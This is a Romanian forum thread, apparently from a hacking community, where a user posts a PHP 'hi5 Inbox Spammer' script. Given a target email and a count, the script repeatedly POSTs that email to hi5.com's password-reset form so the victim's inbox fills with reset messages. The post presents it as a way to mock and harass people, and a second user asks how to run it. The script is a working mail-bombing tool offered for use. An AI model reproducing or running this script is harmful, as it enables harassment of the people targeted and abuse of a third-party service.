Jump to content
Vlachs

hi5 cocalar spammmer(inbox)

Recommended Posts

Posted

Motto

Pentru stralucirea cocalareasca din tine

Merge din consola :*

folosire: script.php email numar_de_email-uri_sa_primeasca

<?php

// by benny_loppa [rowarez.org | insecurity.ro]

set_time_limit(0);
echo "\r\nhi5 Inbox Spammer\r\n";
if($_SERVER['argv'][1]){
for($i=0;$i<$_SERVER['argv'][2];$i++){
do_request();
}
echo "finished spamming ".$_SERVER['argv'][1]."\r\n";
}
function do_request(){
$a=curl_init();
curl_setopt($a,CURLOPT_URL,"http://hi5.com/friend/requestPasswordReset.do");
curl_setopt($a, CURLOPT_POST,TRUE);
curl_setopt($a, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($a, CURLOPT_REFERER,"http://hi5.com/friend/requestPasswordReset.do");
curl_setopt($a, CURLOPT_POSTFIELDS,"email=".$_SERVER['argv'][1]."&hidden=1");
$b=curl_exec($a);
curl_close($a);
}
?>

Lets spam some coca

Posted

stiu ca e lame intrebarea da la ce te referi exact ?

Merge din consola :*
nu le am cu php , tb urcat script.php pe un host? ( daca da imi ziceti si mie unu bun si moca) :D

ps: ms anticipat

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...